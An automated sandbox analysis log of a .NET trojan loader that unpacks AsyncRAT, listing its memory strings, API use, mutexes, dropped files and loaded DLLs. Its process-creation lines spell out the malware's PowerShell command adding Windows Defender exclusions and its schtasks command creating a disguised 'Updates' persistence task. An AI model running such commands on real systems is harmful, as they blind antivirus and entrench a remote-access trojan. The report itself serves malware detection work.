                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D31C00_2_071D31C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D50F00_2_071D50F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 9_2_015D13589_2_015D1358
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 9_2_015D38789_2_015D3878
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 9_2_015D3F489_2_015D3F48
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0100DA3410_2_0100DA34
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07583B7010_2_07583B70
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07583B5F10_2_07583B5F
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0758BB7810_2_0758BB78
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0758BB6910_2_0758BB69
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0758391010_2_07583910
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_075838F010_2_075838F0
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0782A4B010_2_0782A4B0
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0782361010_2_07823610
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07823A4810_2_07823A48
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078259B810_2_078259B8
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078231C010_2_078231C0
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078259C810_2_078259C8
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078231D810_2_078231D8
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078250F010_2_078250F0
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 15_2_013A135815_2_013A1358
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2198229058.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2211596970.00000000077E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2201111262.0000000003643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexraw.exe4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2208561504.0000000006D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000000.2153793589.00000000001C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4628623821.00000000011F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4639187944.0000000005E09000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4637476925.0000000003F71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeBinary or memory string: OriginalFilenameUnIuy.exe" vs SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: xNgpESfQOvfb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, coAw41HW9K74cRgqAt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/18@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1924:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeMutant created: \Sessions\1\BaseNamedObjects\Gt5MojO5rBrt6ybL
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA395.tmpJump to behavior
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeProcess created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
